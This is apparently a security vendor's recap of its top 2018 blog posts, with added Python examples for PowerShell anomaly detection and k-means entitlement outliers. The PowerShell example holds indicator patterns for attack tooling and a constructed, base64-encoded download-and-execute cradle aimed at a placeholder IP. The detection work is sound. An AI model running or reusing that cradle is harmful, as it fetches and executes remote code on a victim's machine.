Top 10 Blog Posts of 2018

As we look back at 2018, let’s see which Gurucul blog posts had the most views. This tells us what resonated with you, our audience. Here is the countdown:

10. Detect Host Compromise With “Domains Generated Algorithmically”

Our #MachineLearningMadness blog posts did very well overall. This post on our Domains Generated Algorithmically Machine Learning Model was particularly popular. Malware that uses a domain generation algorithm (DGA) can produce thousands of candidate rendezvous domains a day, so a static blocklist is stale the moment it is published and manual takedowns cannot keep up. Detecting the character of the queried names themselves, and the burst of lookups for names no human would register, is what makes a model practical here where list-matching is not.

9. Webinar: Automating Security Controls Using Models and Security Orchestration

We were very fortunate to have our Aetna customer present their use case for Gurucul Risk Analytics in a live webinar. This post reviewed the content of that webinar where Kurt Lieber, CISO of Aetna, discussed Aetna’s security orchestration program in depth.

8. Stop Fileless Malware With “Abnormal Powershell Command Execution”

Traditional antivirus and anti-malware software scans files on disk for known signatures. Fileless malware never writes its payload to disk; it runs in memory through trusted tools that are already present, most often PowerShell, so there is no file to scan and nothing for a signature to match. Catching it means looking at behaviour instead: how PowerShell was invoked, what it was asked to do, and whether that is normal for the user and host in question. This is why our post about the Gurucul Abnormal PowerShell Command Execution Machine Learning Model made the top 10 list in 2018.
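Here is an added example of the two checks that paragraph describes, applied to process-creation records: scoring the command line (after decoding any -EncodedCommand payload) for fileless-attack indicators, and comparing the user against their own PowerShell history. It is example code written for this page, not Gurucul's model; the indicator list, weights, the "fewer than five prior executions" baseline rule, the users and the command lines are constructed, and the download cradle is encoded inline so the sample runs offline.

```python
"""Score PowerShell command lines for fileless-malware indicators and flag
executions that are abnormal for the user. Example code written for this
page, not Gurucul's model; the indicator weights are assumptions and the
events below are constructed."""
import base64
import re
from collections import Counter

# (name, pattern, weight) applied to the raw command line plus any decoded
# -EncodedCommand payload. Weights are this example's assumptions.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(?:c|n|nc|ncoded(?:command)?)?(?=\s|$)", re.I), 2),
    ("hidden_window", re.compile(r"-w[a-z]*\s+hidden", re.I), 2),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I), 1),
    ("non_interactive", re.compile(r"-noni(?:nteractive)?\b", re.I), 1),
    ("policy_bypass", re.compile(r"-e[xecutionpolicy]*\s+bypass", re.I), 1),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I), 2),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b", re.I), 2),
    ("in_memory_load", re.compile(r"frombase64string|reflection\.assembly", re.I), 2),
]
ENCODED_ARG = re.compile(r"-e(?:c|n|nc|ncoded(?:command)?)?\s+([A-Za-z0-9+/=]+)", re.I)


def decode_encoded_command(cmdline: str):
    """-EncodedCommand carries base64 of UTF-16LE script; return it as text,
    or None when the flag is absent or the value is not valid base64."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline: str) -> dict:
    """Score the command line together with its decoded payload, so encoding
    the cradle does not hide it from the indicator patterns."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline if decoded is None else cmdline + "\n" + decoded
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(text)]
    return {
        "score": sum(w for _, w in hits),
        "indicators": [name for name, _ in hits],
        "decoded": decoded,
    }


def user_baseline(history) -> Counter:
    """Prior PowerShell executions per user; history is (user, cmdline) pairs."""
    return Counter(user for user, _ in history)


def detect(events, history, min_prior=5, alert_score=4, abnormal_user_score=2):
    """Alert on a high indicator score, or on a moderate score from a user
    with little or no PowerShell history (the 'abnormal for this user' test)."""
    baseline = user_baseline(history)
    alerts = []
    for user, cmdline in events:
        result = analyze(cmdline)
        abnormal_user = baseline[user] < min_prior
        if result["score"] >= alert_score or (abnormal_user and result["score"] >= abnormal_user_score):
            alerts.append({"user": user, "score": result["score"], "abnormal_user": abnormal_user,
                           "indicators": result["indicators"], "decoded": result["decoded"]})
    return alerts


# Constructed download cradle, encoded the way an attacker would pass it.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a.ps1')"
ENCODED_PAYLOAD = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

# Constructed (user, command line) history: an admin who uses PowerShell daily.
SAMPLE_HISTORY = [("ops-admin", "powershell.exe -NoProfile -Command Get-Service -Name Spooler")] * 6

# Constructed new events to evaluate.
SAMPLE_EVENTS = [
    ("ops-admin", r"powershell.exe -NoProfile -File C:\scripts\rotate-logs.ps1"),
    ("jsmith", "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD),
    ("jsmith", r"powershell.exe Get-ChildItem C:\Users\jsmith\Documents"),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS, SAMPLE_HISTORY):
        print(alert)
```

The admin's scripted -NoProfile run scores low and comes from a user with a long PowerShell history, so it is not an alert; the finance user's hidden, encoded download cradle scores high on its own and is doubly suspicious because that account has never launched PowerShell before. The point of the baseline check is the second case in reverse: a modest score that would be routine for an administrator is worth a look when it comes from someone who never runs the tool.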

7. A Q&A With Our CEO About Insider Threats

Who doesn’t love a CEO Q&A? And who isn’t interested in insider threats? In this post, Gurucul CEO Saryu Nayyar discusses why insider threats are still the biggest cyber security problem for companies today.

6. Identify Outlier Access With “Clustering And K-Means”

It might have been the beautiful image that accompanies this post, but more likely it was the valuable content. The Gurucul Clustering and K-Means Machine Learning Model is essentially table stakes for any security analytics solution. K-means groups records into clusters by similarity; applied to entitlements, it groups users who hold similar access into peer groups. An account whose access does not fit its peer group stands out, which turns two hard questions into one comparison: what do you have access to, and what does someone like you normally have access to?
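An added example of that comparison, written for this page and not taken from Gurucul's model: a small k-means implementation over binary entitlement vectors, followed by a report of each entitlement a user holds that fewer than 30% of their own cluster holds. The entitlements, the users, the two-cluster setting and the 30% rarity cut-off are constructed assumptions; the useful property it shows is that a cluster centroid component is exactly the share of peers who hold that entitlement, so the centroid is the peer baseline.

```python
"""K-means over user entitlement vectors to surface access that is unusual
for a user's peer group. Example code written for this page, not Gurucul's
model; the entitlements and users below are constructed."""
import math

ENTITLEMENTS = ["AP_INVOICES", "GL_POSTING", "ERP_REPORTS", "GIT_WRITE", "CI_ADMIN", "PROD_SSH"]

# Constructed access matrix: user -> entitlements held. Finance ("f.") and
# engineering ("e.") users, plus one finance user with engineering access.
ACCESS = {
    "f.alice": {"AP_INVOICES", "GL_POSTING", "ERP_REPORTS"},
    "f.bob": {"AP_INVOICES", "GL_POSTING", "ERP_REPORTS"},
    "f.carol": {"AP_INVOICES", "GL_POSTING", "ERP_REPORTS"},
    "f.dave": {"AP_INVOICES", "GL_POSTING"},
    "e.erin": {"GIT_WRITE", "CI_ADMIN", "PROD_SSH"},
    "e.frank": {"GIT_WRITE", "CI_ADMIN", "PROD_SSH"},
    "e.grace": {"GIT_WRITE", "CI_ADMIN", "PROD_SSH"},
    "e.heidi": {"GIT_WRITE", "CI_ADMIN"},
    "f.mallory": {"AP_INVOICES", "GL_POSTING", "ERP_REPORTS", "GIT_WRITE", "PROD_SSH"},
}


def vectorize(access, entitlements=ENTITLEMENTS):
    """One binary vector per user (1.0 = holds the entitlement), users sorted."""
    users = sorted(access)
    return users, [[1.0 if e in access[u] else 0.0 for e in entitlements] for u in users]


def dist(a, b):
    return math.sqrt(sum((x - y) ** 2 for x, y in zip(a, b)))


def kmeans(points, k, max_iter=100):
    """Lloyd's algorithm with farthest-first seeding, so runs are deterministic.
    Returns (centroids, assignment); assignment[i] is the cluster of points[i]."""
    centroids = [list(points[0])]
    while len(centroids) < k:
        farthest = max(points, key=lambda p: min(dist(p, c) for c in centroids))
        centroids.append(list(farthest))
    assignment = [-1] * len(points)
    for _ in range(max_iter):
        new_assignment = [min(range(k), key=lambda j: dist(p, centroids[j])) for p in points]
        if new_assignment == assignment:
            break
        assignment = new_assignment
        for j in range(k):
            members = [p for p, a in zip(points, assignment) if a == j]
            if members:  # an empty cluster keeps its previous centroid
                centroids[j] = [sum(col) / len(members) for col in zip(*members)]
    return centroids, assignment


def peer_groups(access, k=2):
    """Which users k-means puts together; these are the peer groups."""
    users, points = vectorize(access)
    _, assignment = kmeans(points, k)
    groups = {}
    for user, a in zip(users, assignment):
        groups.setdefault(a, []).append(user)
    return list(groups.values())


def find_outlier_access(access, k=2, rarity=0.3):
    """Cluster users, then report each entitlement a user holds that fewer than
    `rarity` (30%) of the user's own cluster holds. The centroid component for
    an entitlement is exactly that share, so the centroid is the peer baseline."""
    users, points = vectorize(access)
    centroids, assignment = kmeans(points, k)
    outliers = {}
    for user, p, a in zip(users, points, assignment):
        rare = [e for e, held, share in zip(ENTITLEMENTS, p, centroids[a]) if held and share < rarity]
        if rare:
            outliers[user] = rare
    return outliers


if __name__ == "__main__":
    for group in peer_groups(ACCESS):
        print("peer group:", ", ".join(group))
    print("outlier access:", find_outlier_access(ACCESS))
```

Run on the constructed matrix, the finance users land in one cluster and the engineers in the other; f.mallory is placed with finance, and her GIT_WRITE and PROD_SSH entitlements are reported because only one in five of that cluster holds them. f.dave, who merely lacks an entitlement his peers have, is not reported: missing access is a provisioning question, and excess access is the security one.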

5. Meltdown & Spectre – Nearly Every Computer and Device at Risk

Fear is a powerful motivator, which is why this post drew so much attention. It is unsettling to learn that almost every modern computer and mobile device is vulnerable to the Meltdown and Spectre speculative-execution attacks. The mitigations ship as operating system, firmware (microcode) and browser updates, so keeping systems patched is the most effective defense available against this class of attack.

4. Announcing the Second Edition of Borderless Behavior Analytics

It’s no surprise the launch of the second edition of our popular book made the top five posts of 2018! The second edition of “Borderless Behavior Analytics” is twice the size of the first edition, and features insights on the future of predictive security analytics from 12 expert contributors.

3. The Rising Need for Automated Risk Response & Security Analytics

This post discusses the ability to automate front-line security controls based on risk scores derived from User and Entity Behavior Analytics and Identity Analytics. It’s a powerful study of how our customers are redefining the next generation of security analytics, which goes well beyond what can be done with rules and signatures.

2. When Rules Don’t Apply

Let’s talk about the difference between rules and machine learning. A rule can only fire on a condition someone has already written down, so it is blind to anything without a known signature. UEBA powered by machine learning applies analytics to all of the data captured in an environment, learns what normal looks like, and detects changes in existing patterns and the emergence of new ones as they happen: the unknown unknowns a rules-based solution cannot see. Read the full blog post for more on why we need machine learning to catch anomalies whose signatures we don’t have.

1. Security Analytics Is not a SIEM

Drum roll please… the number one most-read post of 2018 was Security Analytics Is not a SIEM! This is great news, because we have been saying this for quite some time. If you haven’t read this post, you should. It shares the key reasons why Security Analytics is not a SIEM. This is especially relevant given that analysts in our space are calling security analytics products second-generation SIEMs. Well, they’re not, and this post tells you why not.

Thank you for reading our blog in 2018! We hope to see you back here in 2019 for more.